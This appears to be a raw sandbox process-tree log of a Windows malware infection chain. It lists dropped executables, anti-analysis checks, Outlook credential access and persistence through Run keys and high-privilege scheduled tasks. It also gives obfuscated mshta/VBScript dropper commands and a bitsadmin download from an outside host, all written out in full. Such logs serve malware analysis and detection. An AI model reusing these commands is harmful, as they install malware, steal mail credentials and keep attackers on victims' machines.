C:\Users\Admin\Pictures\Adobe Films\SkGivFjV9Ji_kRe4vX2iMLzl.exe"C:\Users\Admin\Pictures\Adobe Films\SkGivFjV9Ji_kRe4vX2iMLzl.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4956 -
C:\Users\Admin\Pictures\Adobe Films\3NdneS6adaJJUV_orTDHgDpY.exe"C:\Users\Admin\Pictures\Adobe Films\3NdneS6adaJJUV_orTDHgDpY.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3912 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:6368
-
C:\Users\Admin\Pictures\Adobe Films\WrQ99Xx0hAs_aCUMzjhze3if.exe"C:\Users\Admin\Pictures\Adobe Films\WrQ99Xx0hAs_aCUMzjhze3if.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4440 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1808
-
C:\Users\Admin\Pictures\Adobe Films\WrQ99Xx0hAs_aCUMzjhze3if.exe"C:\Users\Admin\Pictures\Adobe Films\WrQ99Xx0hAs_aCUMzjhze3if.exe"3⤵
- Executes dropped EXE
PID:5436 -
C:\Users\Admin\Pictures\Adobe Films\WrQ99Xx0hAs_aCUMzjhze3if.exe"C:\Users\Admin\Pictures\Adobe Films\WrQ99Xx0hAs_aCUMzjhze3if.exe"3⤵
- Executes dropped EXE
PID:5580 -
C:\Users\Admin\Pictures\Adobe Films\3hfaaFn26tIs9pAVFSAS4oEJ.exe"C:\Users\Admin\Pictures\Adobe Films\3hfaaFn26tIs9pAVFSAS4oEJ.exe"2⤵
- Executes dropped EXE
PID:5044 -
C:\Users\Admin\Pictures\Adobe Films\vDcRvuTFCixtJC75CIreIU92.exe"C:\Users\Admin\Pictures\Adobe Films\vDcRvuTFCixtJC75CIreIU92.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1880 -
C:\Users\Admin\Pictures\Adobe Films\aCPcYZ6iFEv51xb_qSWfJfGr.exe"C:\Users\Admin\Pictures\Adobe Films\aCPcYZ6iFEv51xb_qSWfJfGr.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4292 -
C:\Users\Admin\Pictures\Adobe Films\fyvQdHwzHGYq2Y1YeKRPw2uR.exe"C:\Users\Admin\Pictures\Adobe Films\fyvQdHwzHGYq2Y1YeKRPw2uR.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4216 -
C:\Users\Admin\Pictures\Adobe Films\9AfPHFKCRrsSNYDoKcFofsbB.exe"C:\Users\Admin\Pictures\Adobe Films\9AfPHFKCRrsSNYDoKcFofsbB.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:5188 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Pictures\Adobe Films\9AfPHFKCRrsSNYDoKcFofsbB.exe"3⤵PID:11336
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:11428 -
C:\Users\Admin\Pictures\Adobe Films\QumrVwXKK14FQlUoX6ujeFTg.exe"C:\Users\Admin\Pictures\Adobe Films\QumrVwXKK14FQlUoX6ujeFTg.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5404 -
C:\Users\Admin\Pictures\Adobe Films\TKYeo1nkvUsdw_M3q5vk8nGH.exe"C:\Users\Admin\Pictures\Adobe Films\TKYeo1nkvUsdw_M3q5vk8nGH.exe"2⤵
- Executes dropped EXE
PID:5464 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:8084
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:6884 -
C:\Users\Admin\Pictures\Adobe Films\zCfIBmq8BiRxl8l9o8AWVH_j.exe"C:\Users\Admin\Pictures\Adobe Films\zCfIBmq8BiRxl8l9o8AWVH_j.exe"2⤵
- Executes dropped EXE
PID:1220 -
C:\Users\Admin\Pictures\Adobe Films\YyIud4HFsyGFz5LtvQy2JvHe.exe"C:\Users\Admin\Pictures\Adobe Films\YyIud4HFsyGFz5LtvQy2JvHe.exe"2⤵
- Executes dropped EXE
PID:4004 -
C:\Users\Admin\Pictures\Adobe Films\YyIud4HFsyGFz5LtvQy2JvHe.exe"YyIud4HFsyGFz5LtvQy2JvHe.exe"3⤵
- Executes dropped EXE
PID:5688 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1444⤵
- Program crash
PID:6124 -
C:\Users\Admin\Pictures\Adobe Films\u4F75QvnayckUTxJJGcsMTbn.exe"C:\Users\Admin\Pictures\Adobe Films\u4F75QvnayckUTxJJGcsMTbn.exe"2⤵
- Executes dropped EXE
PID:3232 -
C:\Users\Admin\Documents\pCIIGQzx0Vl5ZrGPNJ9TmobG.exe"C:\Users\Admin\Documents\pCIIGQzx0Vl5ZrGPNJ9TmobG.exe"3⤵
- Checks computer location settings
PID:2892 -
C:\Users\Admin\Pictures\Adobe Films\ZGS6qJjHxjpXyfRMhtg5BhEQ.exe"C:\Users\Admin\Pictures\Adobe Films\ZGS6qJjHxjpXyfRMhtg5BhEQ.exe"4⤵PID:7796
-
C:\Users\Admin\Pictures\Adobe Films\QKTRxIbl4lrCm06gi_c5Yd6j.exe"C:\Users\Admin\Pictures\Adobe Films\QKTRxIbl4lrCm06gi_c5Yd6j.exe"4⤵PID:5840
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\QKTRxIbl4lrCm06gi_c5Yd6j.exe"" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\QKTRxIbl4lrCm06gi_c5Yd6j.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0, tRue ) )5⤵PID:1616
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\QKTRxIbl4lrCm06gi_c5Yd6j.exe" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02&iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\QKTRxIbl4lrCm06gi_c5Yd6j.exe" ) do taskkill -iM "%~NXI" -f6⤵PID:3728
-
C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu027⤵PID:7908
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF ""-PMDrnm85Xpfala4uMu02"" == """" for %I iN ( ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ) do taskkill -iM ""%~NXI"" -f " , 0, tRue ) )8⤵PID:4488
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02&iF "-PMDrnm85Xpfala4uMu02" == "" for %I iN ( "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ) do taskkill -iM "%~NXI" -f9⤵PID:6960
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScripT: clOse(cREaTeObJECT( "wscRIPt.SHELL" ).rUN( "cMd /q /R Echo | SeT /P = ""MZ"" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3 + n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l " , 0, trUE ))8⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
PID:772 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R Echo | SeT /P = "MZ" > 9Ym~JXRX.Lb3 &COpY /b /Y 9YM~jXrX.Lb3+OFnDRVX.8L3+ n7gDJN.Z + S0esI.qY + VOPW5P.PE +qDrS.CQ~+ U78WYSY.oFM +f36Uy3.T ..\bJUC.L& DEl /q *&STArt msiexec.exe /Y ..\bjUC.l9⤵PID:3712
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "10⤵PID:4808
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>9Ym~JXRX.Lb3"10⤵PID:5304
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y ..\bjUC.l10⤵
- Loads dropped DLL
PID:14488 -
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "QKTRxIbl4lrCm06gi_c5Yd6j.exe" -f7⤵
- Kills process with taskkill
PID:5756 -
C:\Users\Admin\Pictures\Adobe Films\opl9VK4iLNUkoxPZKF9Ha6Xe.exe"C:\Users\Admin\Pictures\Adobe Films\opl9VK4iLNUkoxPZKF9Ha6Xe.exe"4⤵PID:7116
-
C:\Users\Admin\Pictures\Adobe Films\0hsYE0Ua39VMSSKkhNqNhUpL.exe"C:\Users\Admin\Pictures\Adobe Films\0hsYE0Ua39VMSSKkhNqNhUpL.exe"4⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7488 -
C:\Users\Admin\Pictures\Adobe Films\lh8EpyfHxgZLJpojiyeSYKX7.exe"C:\Users\Admin\Pictures\Adobe Films\lh8EpyfHxgZLJpojiyeSYKX7.exe" /mixtwo4⤵PID:7436
-
C:\Users\Admin\Pictures\Adobe Films\DzzNk43Gst4DeQwzR9E_xd5k.exe"C:\Users\Admin\Pictures\Adobe Films\DzzNk43Gst4DeQwzR9E_xd5k.exe"4⤵PID:6776
-
C:\Users\Admin\Pictures\Adobe Films\A1qkMvyuFEUK1yz3ELYkGw3O.exe"C:\Users\Admin\Pictures\Adobe Films\A1qkMvyuFEUK1yz3ELYkGw3O.exe"4⤵PID:6240
-
C:\Users\Admin\Pictures\Adobe Films\5X63LA0TXlwGn3oV7J3qv_YW.exe"C:\Users\Admin\Pictures\Adobe Films\5X63LA0TXlwGn3oV7J3qv_YW.exe"4⤵PID:1656
-
C:\Users\Admin\AppData\Roaming\5056112.scr"C:\Users\Admin\AppData\Roaming\5056112.scr" /S5⤵PID:4212
-
C:\Users\Admin\AppData\Roaming\6984721.scr"C:\Users\Admin\AppData\Roaming\6984721.scr" /S5⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6648 -
C:\Users\Admin\AppData\Roaming\4062075.scr"C:\Users\Admin\AppData\Roaming\4062075.scr" /S5⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7224 -
C:\Users\Admin\AppData\Roaming\8633772.scr"C:\Users\Admin\AppData\Roaming\8633772.scr" /S5⤵
- Suspicious behavior: SetClipboardViewer
PID:5276 -
C:\Users\Admin\AppData\Roaming\1444777.scr"C:\Users\Admin\AppData\Roaming\1444777.scr" /S5⤵PID:2312
-
C:\Users\Admin\Pictures\Adobe Films\TUbeQkaNXlmCO1P4yBR44pex.exe"C:\Users\Admin\Pictures\Adobe Films\TUbeQkaNXlmCO1P4yBR44pex.exe"4⤵PID:6856
-
C:\Users\Admin\AppData\Local\Temp\is-BK5JV.tmp\TUbeQkaNXlmCO1P4yBR44pex.tmp"C:\Users\Admin\AppData\Local\Temp\is-BK5JV.tmp\TUbeQkaNXlmCO1P4yBR44pex.tmp" /SL5="$701F8,506127,422400,C:\Users\Admin\Pictures\Adobe Films\TUbeQkaNXlmCO1P4yBR44pex.exe"5⤵
- Loads dropped DLL
PID:6692 -
C:\Users\Admin\AppData\Local\Temp\is-PCN7I.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-PCN7I.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
- Checks computer location settings
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2708 -
C:\Program Files\Windows NT\DUOYKKCDGQ\foldershare.exe"C:\Program Files\Windows NT\DUOYKKCDGQ\foldershare.exe" /VERYSILENT7⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:6768 -
C:\Users\Admin\AppData\Local\Temp\45-a5f19-6d8-c19b1-f6d75e45eca10\Pebyjorewe.exe"C:\Users\Admin\AppData\Local\Temp\45-a5f19-6d8-c19b1-f6d75e45eca10\Pebyjorewe.exe"7⤵
- Checks computer location settings
PID:7916 -
C:\Users\Admin\AppData\Local\Temp\ff-d916a-926-7a0a8-72b77b2152554\Maebataciqo.exe"C:\Users\Admin\AppData\Local\Temp\ff-d916a-926-7a0a8-72b77b2152554\Maebataciqo.exe"7⤵PID:4404
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxumguog.p1r\GcleanerEU.exe /eufive & exit8⤵PID:13084
-
C:\Users\Admin\AppData\Local\Temp\vxumguog.p1r\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\vxumguog.p1r\GcleanerEU.exe /eufive9⤵PID:14440
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b1yjyhqu.rf2\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:14220
-
C:\Users\Admin\AppData\Local\Temp\b1yjyhqu.rf2\installer.exeC:\Users\Admin\AppData\Local\Temp\b1yjyhqu.rf2\installer.exe /qn CAMPAIGN="654"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:14452 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\b1yjyhqu.rf2\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\b1yjyhqu.rf2\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633843711 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵PID:14044
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cbfkig3l.izs\any.exe & exit8⤵PID:14252
-
C:\Users\Admin\AppData\Local\Temp\cbfkig3l.izs\any.exeC:\Users\Admin\AppData\Local\Temp\cbfkig3l.izs\any.exe9⤵PID:15040
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1b3o1fxp.c4h\gcleaner.exe /mixfive & exit8⤵PID:14380
-
C:\Users\Admin\AppData\Local\Temp\1b3o1fxp.c4h\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\1b3o1fxp.c4h\gcleaner.exe /mixfive9⤵PID:15264
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dgrklf04.gs3\autosubplayer.exe /S & exit8⤵PID:14560
-
C:\Users\Admin\AppData\Local\Temp\dgrklf04.gs3\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\dgrklf04.gs3\autosubplayer.exe /S9⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:8156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵
- Loads dropped DLL
PID:1640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:13016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:13612
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:14896
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:14704
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:8596
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵
- Loads dropped DLL
- Checks for any installed AV software in registry
PID:8340 -
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
PID:4392 -
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfT5WYVqWlNx1lAe -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
- Drops file in Program Files directory
PID:11156 -
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pSEpyyqJOWlXpayv -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵PID:8132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:3224
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:11376
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:11664
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:11916
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:11284
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AqDFSDlmWiui\AqDFSDlmWiui.dll" AqDFSDlmWiui10⤵PID:12452
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AqDFSDlmWiui\AqDFSDlmWiui.dll" AqDFSDlmWiui11⤵
- Drops file in System32 directory
PID:12468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:12520
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵
- Drops file in Program Files directory
PID:12888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:13156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:13448
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszE301.tmp\tempfile.ps1"10⤵PID:13324
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT10⤵PID:13824
-
C:\Users\Admin\Pictures\Adobe Films\vd_vJluR5myaUwQqLRcm40FW.exe"C:\Users\Admin\Pictures\Adobe Films\vd_vJluR5myaUwQqLRcm40FW.exe" silent4⤵
- Checks whether UAC is enabled
PID:6876 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6728 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6252 -
C:\Users\Admin\Pictures\Adobe Films\tcpJRWqwduLhUrS_UijaSped.exe"C:\Users\Admin\Pictures\Adobe Films\tcpJRWqwduLhUrS_UijaSped.exe"2⤵PID:5720
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\tcpJRWqwduLhUrS_UijaSped.exe"" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\tcpJRWqwduLhUrS_UijaSped.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0, tRue ) )3⤵PID:6284
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\tcpJRWqwduLhUrS_UijaSped.exe" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02&iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\tcpJRWqwduLhUrS_UijaSped.exe" ) do taskkill -iM "%~NXI" -f4⤵PID:6672
-
C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu025⤵PID:6220
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF ""-PMDrnm85Xpfala4uMu02"" == """" for %I iN ( ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ) do taskkill -iM ""%~NXI"" -f " , 0, tRue ) )6⤵PID:6772
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02&iF "-PMDrnm85Xpfala4uMu02" == "" for %I iN ( "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ) do taskkill -iM "%~NXI" -f7⤵PID:6924
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScripT: clOse(cREaTeObJECT( "wscRIPt.SHELL" ).rUN( "cMd /q /R Echo | SeT /P = ""MZ"" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3 + n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l " , 0, trUE ))6⤵PID:4480
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R Echo | SeT /P = "MZ" > 9Ym~JXRX.Lb3 &COpY /b /Y 9YM~jXrX.Lb3+OFnDRVX.8L3+ n7gDJN.Z + S0esI.qY + VOPW5P.PE +qDrS.CQ~+ U78WYSY.oFM +f36Uy3.T ..\bJUC.L& DEl /q *&STArt msiexec.exe /Y ..\bjUC.l7⤵PID:6312
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "8⤵PID:7640
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>9Ym~JXRX.Lb3"8⤵PID:7696
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y ..\bjUC.l8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640 -
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "tcpJRWqwduLhUrS_UijaSped.exe" -f5⤵
- Kills process with taskkill
PID:6936 -
C:\Users\Admin\Pictures\Adobe Films\Y36fbn0HHDc7M2zmp6CRmgO1.exe"C:\Users\Admin\Pictures\Adobe Films\Y36fbn0HHDc7M2zmp6CRmgO1.exe"2⤵PID:772
-
C:\Users\Admin\Pictures\Adobe Films\QScV3heeU9Q1aSPzY2tBZcTB.exe"C:\Users\Admin\Pictures\Adobe Films\QScV3heeU9Q1aSPzY2tBZcTB.exe"2⤵PID:6116
-
C:\Users\Admin\AppData\Roaming\6185912.scr"C:\Users\Admin\AppData\Roaming\6185912.scr" /S3⤵PID:7288
-
C:\Users\Admin\AppData\Roaming\3237477.scr"C:\Users\Admin\AppData\Roaming\3237477.scr" /S3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7668 -
C:\Users\Admin\AppData\Roaming\3883540.scr"C:\Users\Admin\AppData\Roaming\3883540.scr" /S3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8052 -
C:\Users\Admin\AppData\Roaming\4415613.scr"C:\Users\Admin\AppData\Roaming\4415613.scr" /S3⤵
- Suspicious behavior: SetClipboardViewer
PID:6188 -
C:\Users\Admin\AppData\Roaming\8655547.scr"C:\Users\Admin\AppData\Roaming\8655547.scr" /S3⤵PID:7464
-
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon209b3da1556b9a317.exeMon209b3da1556b9a317.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2152 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
- Executes dropped EXE
PID:3840 -
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵PID:1096
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2956 -
C:\Users\Admin\AppData\Roaming\3389934.scr"C:\Users\Admin\AppData\Roaming\3389934.scr" /S4⤵
- Executes dropped EXE
PID:1884 -
C:\Users\Admin\AppData\Roaming\2194961.scr"C:\Users\Admin\AppData\Roaming\2194961.scr" /S4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4008 -
C:\Users\Admin\AppData\Roaming\7298731.scr"C:\Users\Admin\AppData\Roaming\7298731.scr" /S4⤵
- Executes dropped EXE
- Checks BIOS information in registry
